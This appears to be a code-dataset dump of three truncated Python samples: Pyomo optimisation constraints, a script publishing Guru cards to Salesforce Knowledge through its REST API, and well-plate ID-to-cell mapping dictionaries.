input
stringlengths 2.65k
237k
| output
stringclasses 1
value |
---|---|
m.x1218 == 0)
m.c719 = Constraint(expr= - m.x413 - 0.93056815579703*m.x415 - 0.432978546291743*m.x417 - 0.134305349107462*m.x419
+ m.x1219 == 0)
m.c720 = Constraint(expr= - m.x414 - 0.93056815579703*m.x416 - 0.432978546291743*m.x418 - 0.134305349107462*m.x420
+ m.x1220 == 0)
m.c721 = Constraint(expr= - m.x421 - 0.06943184420297*m.x423 - 0.00241039049471275*m.x425 - 5.57859524324051E-5*m.x427
+ m.x1221 == 0)
m.c722 = Constraint(expr= - m.x422 - 0.06943184420297*m.x424 - 0.00241039049471275*m.x426 - 5.57859524324051E-5*m.x428
+ m.x1222 == 0)
m.c723 = Constraint(expr= - m.x421 - 0.33000947820757*m.x423 - 0.0544531278534163*m.x425 - 0.00599001610322534*m.x427
+ m.x1223 == 0)
m.c724 = Constraint(expr= - m.x422 - 0.33000947820757*m.x424 - 0.0544531278534163*m.x426 - 0.00599001610322534*m.x428
+ m.x1224 == 0)
m.c725 = Constraint(expr= - m.x421 - 0.66999052179243*m.x423 - 0.224443649645846*m.x425 - 0.0501250393130726*m.x427
+ m.x1225 == 0)
m.c726 = Constraint(expr= - m.x422 - 0.66999052179243*m.x424 - 0.224443649645846*m.x426 - 0.0501250393130726*m.x428
+ m.x1226 == 0)
m.c727 = Constraint(expr= - m.x421 - 0.93056815579703*m.x423 - 0.432978546291743*m.x425 - 0.134305349107462*m.x427
+ m.x1227 == 0)
m.c728 = Constraint(expr= - m.x422 - 0.93056815579703*m.x424 - 0.432978546291743*m.x426 - 0.134305349107462*m.x428
+ m.x1228 == 0)
m.c729 = Constraint(expr= - m.x429 - 0.06943184420297*m.x431 - 0.00241039049471275*m.x433 - 5.57859524324051E-5*m.x435
+ m.x1229 == 0)
m.c730 = Constraint(expr= - m.x430 - 0.06943184420297*m.x432 - 0.00241039049471275*m.x434 - 5.57859524324051E-5*m.x436
+ m.x1230 == 0)
m.c731 = Constraint(expr= - m.x429 - 0.33000947820757*m.x431 - 0.0544531278534163*m.x433 - 0.00599001610322534*m.x435
+ m.x1231 == 0)
m.c732 = Constraint(expr= - m.x430 - 0.33000947820757*m.x432 - 0.0544531278534163*m.x434 - 0.00599001610322534*m.x436
+ m.x1232 == 0)
m.c733 = Constraint(expr= - m.x429 - 0.66999052179243*m.x431 - 0.224443649645846*m.x433 - 0.0501250393130726*m.x435
+ m.x1233 == 0)
m.c734 = Constraint(expr= - m.x430 - 0.66999052179243*m.x432 - 0.224443649645846*m.x434 - 0.0501250393130726*m.x436
+ m.x1234 == 0)
m.c735 = Constraint(expr= - m.x429 - 0.93056815579703*m.x431 - 0.432978546291743*m.x433 - 0.134305349107462*m.x435
+ m.x1235 == 0)
m.c736 = Constraint(expr= - m.x430 - 0.93056815579703*m.x432 - 0.432978546291743*m.x434 - 0.134305349107462*m.x436
+ m.x1236 == 0)
m.c737 = Constraint(expr= - m.x437 - 0.06943184420297*m.x439 - 0.00241039049471275*m.x441 - 5.57859524324051E-5*m.x443
+ m.x1237 == 0)
m.c738 = Constraint(expr= - m.x438 - 0.06943184420297*m.x440 - 0.00241039049471275*m.x442 - 5.57859524324051E-5*m.x444
+ m.x1238 == 0)
m.c739 = Constraint(expr= - m.x437 - 0.33000947820757*m.x439 - 0.0544531278534163*m.x441 - 0.00599001610322534*m.x443
+ m.x1239 == 0)
m.c740 = Constraint(expr= - m.x438 - 0.33000947820757*m.x440 - 0.0544531278534163*m.x442 - 0.00599001610322534*m.x444
+ m.x1240 == 0)
m.c741 = Constraint(expr= - m.x437 - 0.66999052179243*m.x439 - 0.224443649645846*m.x441 - 0.0501250393130726*m.x443
+ m.x1241 == 0)
m.c742 = Constraint(expr= - m.x438 - 0.66999052179243*m.x440 - 0.224443649645846*m.x442 - 0.0501250393130726*m.x444
+ m.x1242 == 0)
m.c743 = Constraint(expr= - m.x437 - 0.93056815579703*m.x439 - 0.432978546291743*m.x441 - 0.134305349107462*m.x443
+ m.x1243 == 0)
m.c744 = Constraint(expr= - m.x438 - 0.93056815579703*m.x440 - 0.432978546291743*m.x442 - 0.134305349107462*m.x444
+ m.x1244 == 0)
m.c745 = Constraint(expr= - m.x445 - 0.06943184420297*m.x447 - 0.00241039049471275*m.x449 - 5.57859524324051E-5*m.x451
+ m.x1245 == 0)
m.c746 = Constraint(expr= - m.x446 - 0.06943184420297*m.x448 - 0.00241039049471275*m.x450 - 5.57859524324051E-5*m.x452
+ m.x1246 == 0)
m.c747 = Constraint(expr= - m.x445 - 0.33000947820757*m.x447 - 0.0544531278534163*m.x449 - 0.00599001610322534*m.x451
+ m.x1247 == 0)
m.c748 = Constraint(expr= - m.x446 - 0.33000947820757*m.x448 - 0.0544531278534163*m.x450 - 0.00599001610322534*m.x452
+ m.x1248 == 0)
m.c749 = Constraint(expr= - m.x445 - 0.66999052179243*m.x447 - 0.224443649645846*m.x449 - 0.0501250393130726*m.x451
+ m.x1249 == 0)
m.c750 = Constraint(expr= - m.x446 - 0.66999052179243*m.x448 - 0.224443649645846*m.x450 - 0.0501250393130726*m.x452
+ m.x1250 == 0)
m.c751 = Constraint(expr= - m.x445 - 0.93056815579703*m.x447 - 0.432978546291743*m.x449 - 0.134305349107462*m.x451
+ m.x1251 == 0)
m.c752 = Constraint(expr= - m.x446 - 0.93056815579703*m.x448 - 0.432978546291743*m.x450 - 0.134305349107462*m.x452
+ m.x1252 == 0)
m.c753 = Constraint(expr= - m.x453 - 0.06943184420297*m.x455 - 0.00241039049471275*m.x457 - 5.57859524324051E-5*m.x459
+ m.x1253 == 0)
m.c754 = Constraint(expr= - m.x454 - 0.06943184420297*m.x456 - 0.00241039049471275*m.x458 - 5.57859524324051E-5*m.x460
+ m.x1254 == 0)
m.c755 = Constraint(expr= - m.x453 - 0.33000947820757*m.x455 - 0.0544531278534163*m.x457 - 0.00599001610322534*m.x459
+ m.x1255 == 0)
m.c756 = Constraint(expr= - m.x454 - 0.33000947820757*m.x456 - 0.0544531278534163*m.x458 - 0.00599001610322534*m.x460
+ m.x1256 == 0)
m.c757 = Constraint(expr= - m.x453 - 0.66999052179243*m.x455 - 0.224443649645846*m.x457 - 0.0501250393130726*m.x459
+ m.x1257 == 0)
m.c758 = Constraint(expr= - m.x454 - 0.66999052179243*m.x456 - 0.224443649645846*m.x458 - 0.0501250393130726*m.x460
+ m.x1258 == 0)
m.c759 = Constraint(expr= - m.x453 - 0.93056815579703*m.x455 - 0.432978546291743*m.x457 - 0.134305349107462*m.x459
+ m.x1259 == 0)
m.c760 = Constraint(expr= - m.x454 - 0.93056815579703*m.x456 - 0.432978546291743*m.x458 - 0.134305349107462*m.x460
+ m.x1260 == 0)
m.c761 = Constraint(expr= - m.x461 - 0.06943184420297*m.x463 - 0.00241039049471275*m.x465 - 5.57859524324051E-5*m.x467
+ m.x1261 == 0)
m.c762 = Constraint(expr= - m.x462 - 0.06943184420297*m.x464 - 0.00241039049471275*m.x466 - 5.57859524324051E-5*m.x468
+ m.x1262 == 0)
m.c763 = Constraint(expr= - m.x461 - 0.33000947820757*m.x463 - 0.0544531278534163*m.x465 - 0.00599001610322534*m.x467
+ m.x1263 == 0)
m.c764 = Constraint(expr= - m.x462 - 0.33000947820757*m.x464 - 0.0544531278534163*m.x466 - 0.00599001610322534*m.x468
+ m.x1264 == 0)
m.c765 = Constraint(expr= - m.x461 - 0.66999052179243*m.x463 - 0.224443649645846*m.x465 - 0.0501250393130726*m.x467
+ m.x1265 == 0)
m.c766 = Constraint(expr= - m.x462 - 0.66999052179243*m.x464 - 0.224443649645846*m.x466 - 0.0501250393130726*m.x468
+ m.x1266 == 0)
m.c767 = Constraint(expr= - m.x461 - 0.93056815579703*m.x463 - 0.432978546291743*m.x465 - 0.134305349107462*m.x467
+ m.x1267 == 0)
m.c768 = Constraint(expr= - m.x462 - 0.93056815579703*m.x464 - 0.432978546291743*m.x466 - 0.134305349107462*m.x468
+ m.x1268 == 0)
m.c769 = Constraint(expr= - m.x469 - 0.06943184420297*m.x471 - 0.00241039049471275*m.x473 - 5.57859524324051E-5*m.x475
+ m.x1269 == 0)
m.c770 = Constraint(expr= - m.x470 - 0.06943184420297*m.x472 - 0.00241039049471275*m.x474 - 5.57859524324051E-5*m.x476
+ m.x1270 == 0)
m.c771 = Constraint(expr= - m.x469 - 0.33000947820757*m.x471 - 0.0544531278534163*m.x473 - 0.00599001610322534*m.x475
+ m.x1271 == 0)
m.c772 = Constraint(expr= - m.x470 - 0.33000947820757*m.x472 - 0.0544531278534163*m.x474 - 0.00599001610322534*m.x476
+ m.x1272 == 0)
m.c773 = Constraint(expr= - m.x469 - 0.66999052179243*m.x471 - 0.224443649645846*m.x473 - 0.0501250393130726*m.x475
+ m.x1273 == 0)
m.c774 = Constraint(expr= - m.x470 - 0.66999052179243*m.x472 - 0.224443649645846*m.x474 - 0.0501250393130726*m.x476
+ m.x1274 == 0)
m.c775 = Constraint(expr= - m.x469 - 0.93056815579703*m.x471 - 0.432978546291743*m.x473 - 0.134305349107462*m.x475
+ m.x1275 == 0)
m.c776 = Constraint(expr= - m.x470 - 0.93056815579703*m.x472 - 0.432978546291743*m.x474 - 0.134305349107462*m.x476
+ m.x1276 == 0)
m.c777 = Constraint(expr= - m.x477 - 0.06943184420297*m.x479 - 0.00241039049471275*m.x481 - 5.57859524324051E-5*m.x483
+ m.x1277 == 0)
m.c778 = Constraint(expr= - m.x478 - 0.06943184420297*m.x480 - 0.00241039049471275*m.x482 - 5.57859524324051E-5*m.x484
+ m.x1278 == 0)
m.c779 = Constraint(expr= - m.x477 - 0.33000947820757*m.x479 - 0.0544531278534163*m.x481 - 0.00599001610322534*m.x483
+ m.x1279 == 0)
m.c780 = Constraint(expr= - m.x478 - 0.33000947820757*m.x480 - 0.0544531278534163*m.x482 - 0.00599001610322534*m.x484
+ m.x1280 == 0)
m.c781 = Constraint(expr= - m.x477 - 0.66999052179243*m.x479 - 0.224443649645846*m.x481 - 0.0501250393130726*m.x483
+ m.x1281 == 0)
m.c782 = Constraint(expr= - m.x478 - 0.66999052179243*m.x480 - 0.224443649645846*m.x482 - 0.0501250393130726*m.x484
+ m.x1282 == 0)
m.c783 = Constraint(expr= - m.x477 - 0.93056815579703*m.x479 - 0.432978546291743*m.x481 - 0.134305349107462*m.x483
+ m.x1283 == 0)
m.c784 = Constraint(expr= - m.x478 - 0.93056815579703*m.x480 - 0.432978546291743*m.x482 - 0.134305349107462*m.x484
+ m.x1284 == 0)
m.c785 = Constraint(expr= - m.x485 - 0.06943184420297*m.x487 - 0.00241039049471275*m.x489 - 5.57859524324051E-5*m.x491
+ m.x1285 == 0)
m.c786 = Constraint(expr= - m.x486 - 0.06943184420297*m.x488 - 0.00241039049471275*m.x490 - 5.57859524324051E-5*m.x492
+ m.x1286 == 0)
m.c787 = Constraint(expr= - m.x485 - 0.33000947820757*m.x487 - 0.0544531278534163*m.x489 - 0.00599001610322534*m.x491
+ m.x1287 == 0)
m.c788 = Constraint(expr= - m.x486 - 0.33000947820757*m.x488 - 0.0544531278534163*m.x490 - 0.00599001610322534*m.x492
+ m.x1288 == 0)
m.c789 = Constraint(expr= - m.x485 - 0.66999052179243*m.x487 - 0.224443649645846*m.x489 - 0.0501250393130726*m.x491
+ m.x1289 == 0)
m.c790 = Constraint(expr= - m.x486 - 0.66999052179243*m.x488 - 0.224443649645846*m.x490 - 0.0501250393130726*m.x492
+ m.x1290 == 0)
m.c791 = Constraint(expr= - m.x485 - 0.93056815579703*m.x487 - 0.432978546291743*m.x489 - 0.134305349107462*m.x491
+ m.x1291 == 0)
m.c792 = Constraint(expr= - m.x486 - 0.93056815579703*m.x488 - 0.432978546291743*m.x490 - 0.134305349107462*m.x492
+ m.x1292 == 0)
m.c793 = Constraint(expr= - m.x493 - 0.06943184420297*m.x495 - 0.00241039049471275*m.x497 - 5.57859524324051E-5*m.x499
+ m.x1293 == 0)
m.c794 = Constraint(expr= - m.x494 - 0.06943184420297*m.x496 - 0.00241039049471275*m.x498 - 5.57859524324051E-5*m.x500
+ m.x1294 == 0)
m.c795 = Constraint(expr= - m.x493 - 0.33000947820757*m.x495 - 0.0544531278534163*m.x497 - 0.00599001610322534*m.x499
+ m.x1295 == 0)
m.c796 = Constraint(expr= - m.x494 - 0.33000947820757*m.x496 - 0.0544531278534163*m.x498 - 0.00599001610322534*m.x500
+ m.x1296 == 0)
m.c797 = Constraint(expr= - m.x493 - 0.66999052179243*m.x495 - 0.224443649645846*m.x497 - 0.0501250393130726*m.x499
+ m.x1297 == 0)
m.c798 = Constraint(expr= - m.x494 - 0.66999052179243*m.x496 - 0.224443649645846*m.x498 - 0.0501250393130726*m.x500
+ m.x1298 == 0)
m.c799 = Constraint(expr= - m.x493 - 0.93056815579703*m.x495 - 0.432978546291743*m.x497 - 0.134305349107462*m.x499
+ m.x1299 == 0)
m.c800 = Constraint(expr= - m.x494 - 0.93056815579703*m.x496 - 0.432978546291743*m.x498 - 0.134305349107462*m.x500
+ m.x1300 == 0)
m.c801 = Constraint(expr= m.x1 - m.x3 + 0.019*m.x101 + 0.0095*m.x103 + 0.00316666666666667*m.x105
+ 0.000791666666666667*m.x107 == 0)
m.c802 = Constraint(expr= m.x2 - m.x4 + 0.019*m.x102 + 0.0095*m.x104 + 0.00316666666666667*m.x106
+ 0.000791666666666667*m.x108 == 0)
m.c803 = Constraint(expr= m.x3 - m.x5 + 0.019*m.x109 + 0.0095*m.x111 + 0.00316666666666667*m.x113
+ 0.000791666666666667*m.x115 == 0)
m.c804 = Constraint(expr= m.x4 - m.x6 + 0.019*m.x110 + 0.0095*m.x112 + 0.00316666666666667*m.x114
+ 0.000791666666666667*m.x116 == 0)
m.c805 = Constraint(expr= m.x5 - m.x7 + 0.019*m.x117 + 0.0095*m.x119 + 0.00316666666666667*m.x121
+ 0.000791666666666667*m.x123 == 0)
m.c806 = Constraint(expr= m.x6 - m.x8 + 0.019*m.x118 + 0.0095*m.x120 + 0.00316666666666667*m.x122
+ 0.000791666666666667*m.x124 == 0)
m.c807 = Constraint(expr= m.x7 - m.x9 + 0.019*m.x125 + 0.0095*m.x127 + 0.00316666666666667*m.x129
+ 0.000791666666666667*m.x131 == 0)
m.c808 = Constraint(expr= m.x8 - m.x10 + 0.019*m.x126 + 0.0095*m.x128 + 0.00316666666666667*m.x130
+ 0.000791666666666667*m.x132 == 0)
m.c809 = Constraint(expr= m.x9 - m.x11 + 0.019*m.x133 + 0.0095*m.x135 | |
"""
This script shows how to use Guru's SDK to publish cards, boards, or entire
collections to an external site -- in this case, Salesforce Knowledge.
This script takes the contents of a board in Guru and makes API calls to
Salesforce to create or update Knowledge objects as needed.
1. Behind the scenes, the SDK enumerates all the sections and cards on the
board we specify.
2. The SDK also writes a metadata .json file to keep track of which cards have
been published before.
3. Using the metadata, the SDK knows whether a card has been published before
and needs to be updated in Saleforce or is a brand new card and we need to
create a Knowledge object in Salesforce.
The SDK orchestrates everything and this file just needs to implement methods
that call SFDC's API to do specific tasks. When the SDK sees a card that's never
been published before, it'll call create_external_card and we implement the POST
call to create the external representation of a card (e.g. the Knowledge object)
This script uses these environment variables:
- GURU_USER and GURU_TOKEN to authenticate Guru API calls.
- SFDC_CLIENT_ID
- SFDC_CLIENT_SECRET
- SFDC_USERNAME
- SFDC_PASSWORD
- SFDC_TOKEN
"""
import os
import guru
import requests
from urllib.parse import quote
# these are the names of the collections that will be published.
# we use these to know which collections to publish and to determine
# which cards are internal and which are external.
INTERNAL_COLLECTION = "Publish to Salesforce (Internal)"
EXTERNAL_COLLECTION = "Publish to Salesforce (External)"
# these are the values for an article's Validation Status.
VALIDATED_INTERNAL_ONLY = "Validated Internal only"
VALIDATED_EXTERNAL = "Validated External"
# we expect that data categories are represented in guru as board
# assignments, but we might also want to use specific tags to also
# represent a data category assignment.
TAGS_THAT_ARE_DATA_CATEGORIES = [
"tag 1",
"tag 2",
"tag 3"
]
def is_external(card):
"""
Some articles are internal and some are external. We determine
this by checking which collection the card comes from.
"""
return card.collection.title == EXTERNAL_COLLECTION
def get_data_categories(card):
"""
This returns a list of strings that are the data category names the
card should be assigned to. This is a combination of the names of the
boards the card is on, plus some special tags.
"""
# every board corresponds to a data category.
categories = [b.title for b in card.boards]
# there are also specific tags that also correspond to data categories.
for tag in card.tags:
if tag.value in TAGS_THAT_ARE_DATA_CATEGORIES:
categories.append(tag.value)
return categories
def convert_card_to_article(card):
"""
This builds the Knowledge object that'll be saved in Salesforce.
It's mostly setting the title and body fields but also setting
some other properties based on whether the card represents an
internal article or external one.
"""
data = {
"title": card.title,
# this is the Knowledge object's rich text field which is not configured by default.
# i called mine 'Body' so that's why this is 'Body__c'.
"Body__c": card.content,
# the UrlName is like the title but meant to be displayed in a URL, in Guru
# we have the card's slug which serves the same purpose. the slug has two
# parts, an ID and title, so we just need the second part here.
"UrlName": card.slug.split("/")[1].strip("-"),
}
# we set some properties differently whether it's an internal or external article.
if is_external(card):
data["ValidationStatus"] = VALIDATED_EXTERNAL
# these are the article's channels.
data["IsVisibleInPkb"] = True # public knowledge base
data["IsVisibleInCsp"] = True # customer
data["IsVisibleInPrm"] = True # partner
else:
data["ValidationStatus"] = VALIDATED_INTERNAL_ONLY
# these are the article's channels.
data["IsVisibleInPkb"] = False # public knowledge base
data["IsVisibleInCsp"] = False # customer
data["IsVisibleInPrm"] = False # partner
return data
class SalesforcePublisher(guru.Publisher):
def __init__(self, g, dry_run=False):
super().__init__(g, dry_run=dry_run)
# We need to get an SFDC access token.
# I set this connection up in salesforce by following this guide:
# https://developer.salesforce.com/docs/atlas.en-us.chatterapi.meta/chatterapi/CR_quickstart_oauth.htm
data = {
"grant_type": "password",
"client_id": os.environ.get("SFDC_CLIENT_ID"),
"client_secret": os.environ.get("SFDC_CLIENT_SECRET"),
"username": os.environ.get("SFDC_USERNAME"),
"password": <PASSWORD>("SFDC_PASSWORD") + <PASSWORD>("SFDC_TOKEN")
}
response = requests.post("https://login.salesforce.com/services/oauth2/token", data=data)
if response.status_code >= 400:
error_message = "Failed to authenticate with Salesforce, response status %s, response body %s" % (
response.status_code,
response.content
)
self.log_error(error_message)
raise RuntimeError(error_message)
sfdc_data = response.json()
self.sfdc_token = sfdc_data.get("access_token")
self.sfdc_url = sfdc_data.get("instance_url")
self.data_categories = self.get_all_data_categories()
def get_external_url(self, external_id, card):
"""
This is used for converting card-to-card links to link from one
Salesforce Knowledge object to another. When we're publishing a card
that links to another Guru card, we use this method to convert the
card-to-card link to be a link between salesforce knowledge articles.
"""
return "https://support.getguru.com/help/s/article/%s" % external_id
def find_external_card(self, card):
"""
If some articles may already exist in Salesforce, this method
is how you'd match a Guru card to an existing Knowledge object.
For example, this method could search SFDC to see if there's
a Knowledge object with the same title as this card. If this
method returns the SFDC Object's ID, the SDK then knows the card
exists in SFDC already and calls update_external_card().
If you expect all articles will be written in Guru first, then
you don't need to worry about this method.
"""
pass
def sfdc_get(self, url):
"""
Makes a GET call to salesforce's API. This adds some convenience by adding
the salesforce instance URL as a prefix and parses the JSON response.
"""
headers = {
"Authorization": "Bearer %s" % self.sfdc_token
}
# you can pass in just "/services/data/..." as the url and we'll add the prefix.
if not url.startswith("https:"):
url = self.sfdc_url + url
response = requests.get(url, headers=headers)
if response.status_code >= 400:
return self.log_error("Salesforce API Error, URL: %s, response status %s, response body: %s" % (
url,
response.status_code,
response.content
))
return response.json()
def sfdc_post(self, url, data):
"""
Makes a POST call to salesforce's API. This adds some convenience by adding
the salesforce instance URL as a prefix and parses the JSON response.
"""
headers = {
"Authorization": "Bearer %s" % self.sfdc_token
}
# you can pass in just "/services/data/..." as the url and we'll add the prefix.
if not url.startswith("https:"):
url = self.sfdc_url + url
response = requests.post(url, json=data, headers=headers)
if response.status_code >= 400:
return self.log_error("Salesforce API Error, URL: %s, response status %s, response body: %s" % (
url,
response.status_code,
response.content
))
return response.json()
def sfdc_patch(self, url, data):
"""
Makes a PATCH call to salesforce's API. This adds some convenience by adding
the salesforce instance URL as a prefix and parses the JSON response.
"""
headers = {
"Authorization": "Bearer %s" % self.sfdc_token
}
# you can pass in just "/services/data/..." as the url and we'll add the prefix.
if not url.startswith("https:"):
url = self.sfdc_url + url
response = requests.patch(url, json=data, headers=headers)
if response.status_code >= 400:
return self.log_error("Salesforce API Error, URL: %s, response status %s, response body: %s" % (
url,
response.status_code,
response.content
))
return True
def sfdc_delete(self, url):
"""
Makes a DELETE call to salesforce's API. This adds some convenience by adding
the salesforce instance URL as a prefix and parses the JSON response.
"""
headers = {
"Authorization": "Bearer %s" % self.sfdc_token
}
# you can pass in just "/services/data/..." as the url and we'll add the prefix.
if not url.startswith("https:"):
url = self.sfdc_url + url
response = requests.delete(url, headers=headers)
if response.status_code == 204:
return True
else:
return response.json()
def get_all_data_categories(self):
"""
Loads the list of all Data Categories and Data Category Groups from
Salesforce. When we need to map an article to a Data Category, we'll need
to have the Data Category's ID. By loading all of them up front, we'll be
able to look up the ID when we need it without making extra API calls.
"""
# https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/dome_query.htm
data_category_groups = self.sfdc_get("/services/data/v52.0/support/dataCategoryGroups?sObjectName=KnowledgeArticleVersion&topCategoriesOnly=false").get("categoryGroups")
# data categories are arranged in a tree so we use this function to recursively
# find all categories and build a flat list.
def find_categories(group_name, objects):
categories = []
# each object in the list looks like this:
# {
# 'childCategories': [],
# 'label': 'Known Issues',
# 'name': 'Known_Issues',
# 'url': '/services/data/v52.0/support/dataCategoryGroups/Announcements/dataCategories/Known_Issues?sObjectName=KnowledgeArticleVersion'
| |
68,
},
69: {
'col_and_row': u'F9',
'row': 6,
'col': 9,
'well_id': 69,
},
70: {
'col_and_row': u'F10',
'row': 6,
'col': 10,
'well_id': 70,
},
71: {
'col_and_row': u'F11',
'row': 6,
'col': 11,
'well_id': 71,
},
72: {
'col_and_row': u'F12',
'row': 6,
'col': 12,
'well_id': 72,
},
73: {
'col_and_row': u'G1',
'row': 7,
'col': 1,
'well_id': 73,
},
74: {
'col_and_row': u'G2',
'row': 7,
'col': 2,
'well_id': 74,
},
75: {
'col_and_row': u'G3',
'row': 7,
'col': 3,
'well_id': 75,
},
76: {
'col_and_row': u'G4',
'row': 7,
'col': 4,
'well_id': 76,
},
77: {
'col_and_row': u'G5',
'row': 7,
'col': 5,
'well_id': 77,
},
78: {
'col_and_row': u'G6',
'row': 7,
'col': 6,
'well_id': 78,
},
79: {
'col_and_row': u'G7',
'row': 7,
'col': 7,
'well_id': 79,
},
80: {
'col_and_row': u'G8',
'row': 7,
'col': 8,
'well_id': 80,
},
81: {
'col_and_row': u'G9',
'row': 7,
'col': 9,
'well_id': 81,
},
82: {
'col_and_row': u'G10',
'row': 7,
'col': 10,
'well_id': 82,
},
83: {
'col_and_row': u'G11',
'row': 7,
'col': 11,
'well_id': 83,
},
84: {
'col_and_row': u'G12',
'row': 7,
'col': 12,
'well_id': 84,
},
85: {
'col_and_row': u'H1',
'row': 8,
'col': 1,
'well_id': 85,
},
86: {
'col_and_row': u'H2',
'row': 8,
'col': 2,
'well_id': 86,
},
87: {
'col_and_row': u'H3',
'row': 8,
'col': 3,
'well_id': 87,
},
88: {
'col_and_row': u'H4',
'row': 8,
'col': 4,
'well_id': 88,
},
89: {
'col_and_row': u'H5',
'row': 8,
'col': 5,
'well_id': 89,
},
90: {
'col_and_row': u'H6',
'row': 8,
'col': 6,
'well_id': 90,
},
91: {
'col_and_row': u'H7',
'row': 8,
'col': 7,
'well_id': 91,
},
92: {
'col_and_row': u'H8',
'row': 8,
'col': 8,
'well_id': 92,
},
93: {
'col_and_row': u'H9',
'row': 8,
'col': 9,
'well_id': 93,
},
94: {
'col_and_row': u'H10',
'row': 8,
'col': 10,
'well_id': 94,
},
95: {
'col_and_row': u'H11',
'row': 8,
'col': 11,
'well_id': 95,
},
96: {
'col_and_row': u'H12',
'row': 8,
'col': 12,
'well_id': 96,
},
}
well_id_to_cell_map_384 = {
1: {
'col_and_row': u'A1',
'row': 1,
'col': 1,
'well_id': 1,
},
2: {
'col_and_row': u'A2',
'row': 1,
'col': 2,
'well_id': 2,
},
3: {
'col_and_row': u'A3',
'row': 1,
'col': 3,
'well_id': 3,
},
4: {
'col_and_row': u'A4',
'row': 1,
'col': 4,
'well_id': 4,
},
5: {
'col_and_row': u'A5',
'row': 1,
'col': 5,
'well_id': 5,
},
6: {
'col_and_row': u'A6',
'row': 1,
'col': 6,
'well_id': 6,
},
7: {
'col_and_row': u'A7',
'row': 1,
'col': 7,
'well_id': 7,
},
8: {
'col_and_row': u'A8',
'row': 1,
'col': 8,
'well_id': 8,
},
9: {
'col_and_row': u'A9',
'row': 1,
'col': 9,
'well_id': 9,
},
10: {
'col_and_row': u'A10',
'row': 1,
'col': 10,
'well_id': 10,
},
11: {
'col_and_row': u'A11',
'row': 1,
'col': 11,
'well_id': 11,
},
12: {
'col_and_row': u'A12',
'row': 1,
'col': 12,
'well_id': 12,
},
13: {
'col_and_row': u'A13',
'row': 1,
'col': 13,
'well_id': 13,
},
14: {
'col_and_row': u'A14',
'row': 1,
'col': 14,
'well_id': 14,
},
15: {
'col_and_row': u'A15',
'row': 1,
'col': 15,
'well_id': 15,
},
16: {
'col_and_row': u'A16',
'row': 1,
'col': 16,
'well_id': 16,
},
17: {
'col_and_row': u'A17',
'row': 1,
'col': 17,
'well_id': 17,
},
18: {
'col_and_row': u'A18',
'row': 1,
'col': 18,
'well_id': 18,
},
19: {
'col_and_row': u'A19',
'row': 1,
'col': 19,
'well_id': 19,
},
20: {
'col_and_row': u'A20',
'row': 1,
'col': 20,
'well_id': 20,
},
21: {
'col_and_row': u'A21',
'row': 1,
'col': 21,
'well_id': 21,
},
22: {
'col_and_row': u'A22',
'row': 1,
'col': 22,
'well_id': 22,
},
23: {
'col_and_row': u'A23',
'row': 1,
'col': 23,
'well_id': 23,
},
24: {
'col_and_row': u'A24',
'row': 1,
'col': 24,
'well_id': 24,
},
25: {
'col_and_row': u'B1',
'row': 2,
'col': 1,
'well_id': 25,
},
26: {
'col_and_row': u'B2',
'row': 2,
'col': 2,
'well_id': 26,
},
27: {
'col_and_row': u'B3',
'row': 2,
'col': 3,
'well_id': 27,
},
28: {
'col_and_row': u'B4',
'row': 2,
'col': 4,
'well_id': 28,
},
29: {
'col_and_row': u'B5',
'row': 2,
'col': 5,
'well_id': 29,
},
30: {
'col_and_row': u'B6',
'row': 2,
'col': 6,
'well_id': 30,
},
31: {
'col_and_row': u'B7',
'row': 2,
'col': 7,
'well_id': 31,
},
32: {
'col_and_row': u'B8',
'row': 2,
'col': 8,
'well_id': 32,
},
33: {
'col_and_row': u'B9',
'row': 2,
'col': 9,
'well_id': 33,
},
34: {
'col_and_row': u'B10',
'row': 2,
'col': 10,
'well_id': 34,
},
35: {
'col_and_row': u'B11',
'row': 2,
'col': 11,
'well_id': 35,
},
36: {
'col_and_row': u'B12',
'row': 2,
'col': 12,
'well_id': 36,
},
37: {
'col_and_row': u'B13',
'row': 2,
'col': 13,
'well_id': 37,
},
38: {
'col_and_row': u'B14',
'row': 2,
'col': 14,
'well_id': 38,
},
39: {
'col_and_row': u'B15',
'row': 2,
'col': 15,
'well_id': 39,
},
40: {
'col_and_row': u'B16',
'row': 2,
'col': 16,
'well_id': 40,
},
41: {
'col_and_row': u'B17',
'row': 2,
'col': 17,
'well_id': 41,
},
42: {
'col_and_row': u'B18',
'row': 2,
'col': 18,
'well_id': 42,
},
43: {
'col_and_row': u'B19',
'row': 2,
'col': 19,
'well_id': 43,
},
44: {
'col_and_row': u'B20',
'row': 2,
'col': 20,
'well_id': 44,
},
45: {
'col_and_row': u'B21',
'row': 2,
'col': 21,
'well_id': 45,
},
46: {
'col_and_row': u'B22',
'row': 2,
'col': 22,
'well_id': 46,
},
47: {
'col_and_row': u'B23',
'row': 2,
'col': 23,
'well_id': 47,
},
48: {
'col_and_row': u'B24',
'row': 2,
'col': 24,
'well_id': 48,
},
49: {
'col_and_row': u'C1',
'row': 3,
'col': 1,
'well_id': 49,
},
50: {
'col_and_row': u'C2',
'row': 3,
'col': 2,
'well_id': 50,
},
51: {
'col_and_row': u'C3',
'row': 3,
'col': 3,
'well_id': 51,
},
52: {
'col_and_row': u'C4',
'row': 3,
'col': 4,
'well_id': 52,
},
53: {
'col_and_row': u'C5',
'row': 3,
'col': 5,
'well_id': 53,
},
54: {
'col_and_row': u'C6',
'row': 3,
'col': 6,
'well_id': 54,
},
55: {
'col_and_row': u'C7',
'row': 3,
'col': 7,
'well_id': 55,
},
56: {
'col_and_row': u'C8',
'row': 3,
'col': 8,
'well_id': 56,
},
57: {
'col_and_row': u'C9',
'row': 3,
'col': 9,
'well_id': 57,
},
58: {
'col_and_row': u'C10',
'row': 3,
'col': 10,
'well_id': 58,
},
59: {
'col_and_row': u'C11',
'row': 3,
'col': 11,
'well_id': 59,
},
60: {
'col_and_row': u'C12',
'row': 3,
'col': 12,
'well_id': 60,
},
61: {
'col_and_row': u'C13',
'row': 3,
'col': 13,
'well_id': 61,
},
62: {
'col_and_row': u'C14',
'row': 3,
'col': 14,
'well_id': 62,
},
63: {
'col_and_row': u'C15',
'row': 3,
'col': 15,
'well_id': 63,
},
64: {
'col_and_row': u'C16',
'row': 3,
'col': 16,
'well_id': 64,
},
65: {
'col_and_row': u'C17',
'row': 3,
'col': 17,
'well_id': 65,
},
66: {
'col_and_row': u'C18',
'row': 3,
'col': 18,
'well_id': 66,
},
67: {
'col_and_row': u'C19',
'row': 3,
'col': 19,
'well_id': 67,
},
68: {
'col_and_row': u'C20',
'row': 3,
'col': 20,
'well_id': 68,
},
69: {
'col_and_row': u'C21',
'row': 3,
'col': 21,
